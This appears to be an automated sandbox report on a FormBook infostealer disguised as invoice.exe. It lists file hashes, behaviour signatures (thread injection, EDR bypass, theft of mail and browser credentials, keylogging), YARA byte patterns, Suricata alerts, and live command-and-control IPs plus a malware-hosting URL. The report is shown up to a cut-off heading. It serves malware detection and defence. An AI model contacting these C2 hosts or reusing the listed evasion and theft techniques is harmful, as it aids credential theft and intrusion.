
Windows Analysis Report
invoice.exe

Overview

General Information

Sample name: invoice.exe
Analysis ID: 1510744
MD5: 8387395792cfc0abb08dc4c23b8ad700
SHA1: 10da8047d3a56f769b7b70906cfdd3342b6487ef
SHA256: 6e66e6f4874039caa5e41d1da7b90159c8ada4373c2fd27eb080c3f6d9db5d81
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc.)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString, GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • invoice.exe (PID: 5408 cmdline: "C:\Users\user\Desktop\invoice.exe" MD5: 8387395792CFC0ABB08DC4C23B8AD700)
    • svchost.exe (PID: 2520 cmdline: "C:\Users\user\Desktop\invoice.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • usnnduqerdgHbr.exe (PID: 3260 cmdline: "C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • at.exe (PID: 5764 cmdline: "C:\Windows\SysWOW64\at.exe" MD5: 2AE20048111861FA09B709D3CC551AD6)
          • usnnduqerdgHbr.exe (PID: 3120 cmdline: "C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5024 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author
00000003.00000002.3576495613.0000000003730000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000003.00000002.3576495613.0000000003730000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • Strings: 0x2be90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • Strings: 0x13f7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.3575236547.0000000003260000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000003.00000002.3575236547.0000000003260000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • Strings: 0x2be90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • Strings: 0x13f7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.1867193556.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
(table truncated; the full report lists 11 entries)

Source | Rule | Description | Author
1.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
1.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • Strings: 0x2e4f3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • Strings: 0x165e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
1.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
1.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • Strings: 0x2f2f3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • Strings: 0x173e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\invoice.exe", CommandLine: "C:\Users\user\Desktop\invoice.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\invoice.exe", ParentImage: C:\Users\user\Desktop\invoice.exe, ParentProcessId: 5408, ParentProcessName: invoice.exe, ProcessCommandLine: "C:\Users\user\Desktop\invoice.exe", ProcessId: 2520, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\invoice.exe", CommandLine: "C:\Users\user\Desktop\invoice.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\invoice.exe", ParentImage: C:\Users\user\Desktop\invoice.exe, ParentProcessId: 5408, ParentProcessName: invoice.exe, ProcessCommandLine: "C:\Users\user\Desktop\invoice.exe", ProcessId: 2520, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-13T12:27:12.068665+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50401 | 34.150.58.73 | 80 | TCP
2024-09-13T12:27:44.114915+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50405 | 195.24.68.25 | 80 | TCP
2024-09-13T12:27:58.009578+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50409 | 162.0.213.94 | 80 | TCP
2024-09-13T12:28:12.118591+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50413 | 154.23.184.240 | 80 | TCP
2024-09-13T12:28:26.500137+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50417 | 47.104.180.139 | 80 | TCP
2024-09-13T12:28:47.750673+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50421 | 3.33.130.190 | 80 | TCP
2024-09-13T12:29:09.136695+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50425 | 199.59.243.226 | 80 | TCP
2024-09-13T12:29:22.926625+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50429 | 162.241.226.190 | 80 | TCP
2024-09-13T12:29:37.516534+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50433 | 91.215.85.23 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-13T12:27:12.068665+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50401 | 34.150.58.73 | 80 | TCP
2024-09-13T12:27:44.114915+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50405 | 195.24.68.25 | 80 | TCP
2024-09-13T12:27:58.009578+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50409 | 162.0.213.94 | 80 | TCP
2024-09-13T12:28:12.118591+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50413 | 154.23.184.240 | 80 | TCP
2024-09-13T12:28:26.500137+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50417 | 47.104.180.139 | 80 | TCP
2024-09-13T12:28:47.750673+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50421 | 3.33.130.190 | 80 | TCP
2024-09-13T12:29:09.136695+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50425 | 199.59.243.226 | 80 | TCP
2024-09-13T12:29:22.926625+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50429 | 162.241.226.190 | 80 | TCP
2024-09-13T12:29:37.516534+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50433 | 91.215.85.23 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-13T12:27:36.406189+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50402 | 195.24.68.25 | 80 | TCP
2024-09-13T12:27:38.981289+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50403 | 195.24.68.25 | 80 | TCP
2024-09-13T12:27:41.509593+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50404 | 195.24.68.25 | 80 | TCP
2024-09-13T12:27:50.249780+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50406 | 162.0.213.94 | 80 | TCP
2024-09-13T12:27:52.895730+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50407 | 162.0.213.94 | 80 | TCP
2024-09-13T12:27:55.566129+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50408 | 162.0.213.94 | 80 | TCP
2024-09-13T12:28:04.472198+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50410 | 154.23.184.240 | 80 | TCP
2024-09-13T12:28:07.016156+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50411 | 154.23.184.240 | 80 | TCP
2024-09-13T12:28:09.804943+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50412 | 154.23.184.240 | 80 | TCP
2024-09-13T12:28:18.860641+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50414 | 47.104.180.139 | 80 | TCP
2024-09-13T12:28:21.405375+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50415 | 47.104.180.139 | 80 | TCP
2024-09-13T12:28:23.960871+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50416 | 47.104.180.139 | 80 | TCP
2024-09-13T12:28:41.038596+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50418 | 3.33.130.190 | 80 | TCP
2024-09-13T12:28:42.647720+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50419 | 3.33.130.190 | 80 | TCP
2024-09-13T12:28:45.246673+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50420 | 3.33.130.190 | 80 | TCP
2024-09-13T12:29:01.458588+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50422 | 199.59.243.226 | 80 | TCP
2024-09-13T12:29:04.037143+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50423 | 199.59.243.226 | 80 | TCP
2024-09-13T12:29:06.625795+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50424 | 199.59.243.226 | 80 | TCP
2024-09-13T12:29:14.920189+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50426 | 162.241.226.190 | 80 | TCP
2024-09-13T12:29:17.468744+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50427 | 162.241.226.190 | 80 | TCP
2024-09-13T12:29:20.081191+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50428 | 162.241.226.190 | 80 | TCP
2024-09-13T12:29:29.806640+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50430 | 91.215.85.23 | 80 | TCP
2024-09-13T12:29:32.307060+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50431 | 91.215.85.23 | 80 | TCP
2024-09-13T12:29:34.992744+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50432 | 91.215.85.23 | 80 | TCP


            AV Detection

Source: http://www.kalomor.top/1i25/?MtXH8dRH=hvoPcElTJ0Y3piwLtjSln1mmdkYNLw6anL/4ADmEhhaGoTcu5w6VaNtYttD808rfRbfsmOcnHjc3Cl4jYjdANHGjovYJiL0/kcRCteZsHg47/gztzPUw9dw=&EB04T=0hSTF8phw; Avira URL Cloud: Label: malware
Source: http://www.kalomor.top/1i25/; Avira URL Cloud: Label: malware
Source: http://www.kalomor.top; Avira URL Cloud: Label: malware
Source: kalomor.top; Virustotal: Detection: 5%
Source: www.teksales.space; Virustotal: Detection: 7%
Source: www.kalomor.top; Virustotal: Detection: 5%
Source: http://www.kalomor.top; Virustotal: Detection: 5%
Source: invoice.exe; ReversingLabs: Detection: 23%
Source: invoice.exe; Virustotal: Detection: 30%
Source: Yara match; File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000003.00000002.3576495613.0000000003730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.3575236547.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.1867193556.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.3576582157.00000000037C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.3576662143.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.1867580811.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.3576480081.0000000002850000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.1867970632.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: invoice.exe; Joe Sandbox ML: detected
Source: invoice.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: at.pdb source: svchost.exe, 00000001.00000003.1826096007.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1867363177.0000000003200000.00000004.00000020.00020000.00000000.sdmp, usnnduqerdgHbr.exe, 00000002.00000002.3575669799.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: usnnduqerdgHbr.exe, 00000002.00000000.1784643817.0000000000DCE000.00000002.00000001.01000000.00000004.sdmp, usnnduqerdgHbr.exe, 00000007.00000002.3576287714.0000000000DCE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: invoice.exe, 00000000.00000003.1718353070.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, invoice.exe, 00000000.00000003.1717554649.0000000004260000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1867610826.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1767065111.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1867610826.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1768545238.0000000003700000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000003.1869790463.0000000003978000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3576797983.0000000003B20000.00000040.00001000.00020000.00000000.sdmp, at.exe, 00000003.00000003.1867832412.00000000037CB000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3576797983.0000000003CBE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: invoice.exe, 00000000.00000003.1718353070.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, invoice.exe, 00000000.00000003.1717554649.0000000004260000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1867610826.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1767065111.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1867610826.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1768545238.0000000003700000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000003.1869790463.0000000003978000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3576797983.0000000003B20000.00000040.00001000.00020000.00000000.sdmp, at.exe, 00000003.00000003.1867832412.00000000037CB000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3576797983.0000000003CBE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: at.pdbGCTL source: svchost.exe, 00000001.00000003.1826096007.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1867363177.0000000003200000.00000004.00000020.00020000.00000000.sdmp, usnnduqerdgHbr.exe, 00000002.00000002.3575669799.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: at.exe, 00000003.00000002.3577269049.000000000414C000.00000004.10000000.00040000.00000000.sdmp, at.exe, 00000003.00000002.3575543840.0000000003542000.00000004.00000020.00020000.00000000.sdmp, usnnduqerdgHbr.exe, 00000007.00000000.1933940894.0000000002B2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2261440991.000000001055C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: at.exe, 00000003.00000002.3577269049.000000000414C000.00000004.10000000.00040000.00000000.sdmp, at.exe, 00000003.00000002.3575543840.0000000003542000.00000004.00000020.00020000.00000000.sdmp, usnnduqerdgHbr.exe, 00000007.00000000.1933940894.0000000002B2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2261440991.000000001055C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\invoice.exe; Code function: 0_2_00FE449B GetFileAttributesW,FindFirstFileW,FindClose,0_2_00FE449B
Source: C:\Users\user\Desktop\invoice.exe; Code function: 0_2_00FEC7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00FEC7E8
Source: C:\Users\user\Desktop\invoice.exe; Code function: 0_2_00FEC75D FindFirstFileW,FindClose,0_2_00FEC75D
Source: C:\Users\user\Desktop\invoice.exe; Code function: 0_2_00FEF021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00FEF021
Source: C:\Users\user\Desktop\invoice.exe; Code function: 0_2_00FEF17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00FEF17E
Source: C:\Users\user\Desktop\invoice.exe; Code function: 0_2_00FEF47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00FEF47F
Source: C:\Users\user\Desktop\invoice.exe; Code function: 0_2_00FE3833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00FE3833
Source: C:\Users\user\Desktop\invoice.exe; Code function: 0_2_00FE3B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00FE3B56
Source: C:\Users\user\Desktop\invoice.exe; Code function: 0_2_00FEBD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00FEBD48

            Networking

Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50416 -> 47.104.180.139:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50405 -> 195.24.68.25:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50405 -> 195.24.68.25:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50417 -> 47.104.180.139:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50402 -> 195.24.68.25:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50410 -> 154.23.184.240:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50427 -> 162.241.226.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50423 -> 199.59.243.226:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50417 -> 47.104.180.139:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50401 -> 34.150.58.73:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50401 -> 34.150.58.73:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50419 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50411 -> 154.23.184.240:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50406 -> 162.0.213.94:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50409 -> 162.0.213.94:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50432 -> 91.215.85.23:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50420 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50408 -> 162.0.213.94:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50409 -> 162.0.213.94:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50413 -> 154.23.184.240:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50430 -> 91.215.85.23:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50431 -> 91.215.85.23:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50428 -> 162.241.226.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50407 -> 162.0.213.94:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50413 -> 154.23.184.240:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50418 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50422 -> 199.59.243.226:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50426 -> 162.241.226.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50424 -> 199.59.243.226:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50433 -> 91.215.85.23:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50433 -> 91.215.85.23:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50412 -> 154.23.184.240:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50404 -> 195.24.68.25:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50425 -> 199.59.243.226:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50425 -> 199.59.243.226:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50429 -> 162.241.226.190:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50429 -> 162.241.226.190:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50421 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50421 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50403 -> 195.24.68.25:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50414 -> 47.104.180.139:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50415 -> 47.104.180.139:80
            Source: DNS query: www.syvra.xyz
Source: Joe Sandbox View; IP Address: 91.215.85.23
Source: Joe Sandbox View; IP Address: 162.0.213.94
Source: Joe Sandbox View; ASN Name: PINDC-ASRU
Source: Joe Sandbox View; ASN Name: ACPCA
Source: Joe Sandbox View; ASN Name: UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View; ASN Name: ATGS-MMD-ASUS
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (16 identical entries)
Source: C:\Users\user\Desktop\invoice.exe; Code function: 0_2_00FF2404 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00FF2404
Source: global traffic; HTTP traffic detected:
